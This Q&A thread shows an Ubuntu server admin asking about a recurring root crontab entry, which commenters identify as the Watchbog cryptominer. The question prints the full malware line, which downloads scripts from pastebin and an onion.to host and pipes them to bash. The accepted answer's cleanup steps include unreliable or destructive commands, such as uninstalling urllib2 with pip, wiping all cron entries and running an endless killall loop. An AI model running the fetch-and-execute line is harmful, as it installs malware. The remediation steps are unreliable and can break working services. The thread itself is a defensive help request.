# Ubuntu Server 16.04 unusual crontab entry

Tags: server, cron

Good day to all,

I have this crontab entry in the root user of our Ubuntu Server 16.04 VM.

```
*/11 * * * * (curl -fsSL https://pastebin.com/raw/9QVpd02i||wget -q -O- https://pastebin.com/raw/9QVpd02i||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/t3B4cpC8").read()'||curl -fsSL https://pastebin.com/raw/TwuQybiQ||wget -q -O - https://pastebin.com/raw/TwuQybiQ||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt -m 90||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
```

Every time I deleted this entry, it will come back moments later. Does anyone have any idea what I have gone into? Is this server was pawned in some way?

The workaround I've done to defeat this entry, because I can't permanently delete it, I have made two DNS entries in our gateway/router where pastebin.com and onion.to will point to 127.0.0.1.

I think this is not a duplicate of the crypto issue posted in the comment, but is similar. So, this question will remain separate, since after review, this will require a different solution. Thanks.

Regards,
Allan

Comment: Possible duplicate of [Crypto miner malware](https://askubuntu.com/questions/1150346/crypto-miner-malware)

Comment: You have a cryptominer. Unless you're willing to read trough the scripts (which you provide the URL to in your post) and weed out the culprits manually, best course is probably complete reinstall.

Comment: @vidarlo the option to reinstall is difficult, since the server is also an email server. I noticed that it no longer update the crontab for that entry. Trying to find some unusual entries in systemd directory, but so far found none. I guess the DNS method is working for now. But really, reinstall is the safest option.

Answer (score 1, accepted):

As stated in comments you have a virus installed by crypto miner. This tells you how to remove it: [Watchbog Vulnerability](https://www.linode.com/community/questions/18657/watchbog-vulnerability)

To summarize the steps:

```
crontab –r
ls /var/spool/cron/crontabs
pip uninstall urllib2
apt-get remove --auto-remove curl
apt-get remove --auto-remove wget
crontab -r
while true ; do killall watchbog ; done
sudo passwd root
```

Read the entire link for step by step details and to verify you have this virus in the first place.

Comment: Thanks for your answer. One more thing, the crypto miner was somehow installed by a remote hacker? Or is it possible that the one who installed it has physical access to this server?

Comment: Oh my goodness. I don't have a clue. I'll ask someone who might know.

Comment: :)  Thanks anyway. Can't remove all the crontab entries because there are zimbra services running. :)  I can't find any "watchdog" processes .

Comment: @AllanRegistos someone needs access to the machine. It might be installed as part of another installation. Please track down if someone installed software from source that included this. Looking at then name: watchbog. Monero crypto. Someone probably installed it willingly or unwillingly as part of another unverified download.

Comment: Allan this sounds like an opportunity to post a new question and let us know so @Rinzwind can answer it in full if he is acceptable to that idea.

Comment: The entry stopped already for some reason,and it no longer add entry to the crontab. @Rinzwind maybe right. But I do not want to bad mouth my former assistant, maybe  it is I, or him that unintentionally installed it.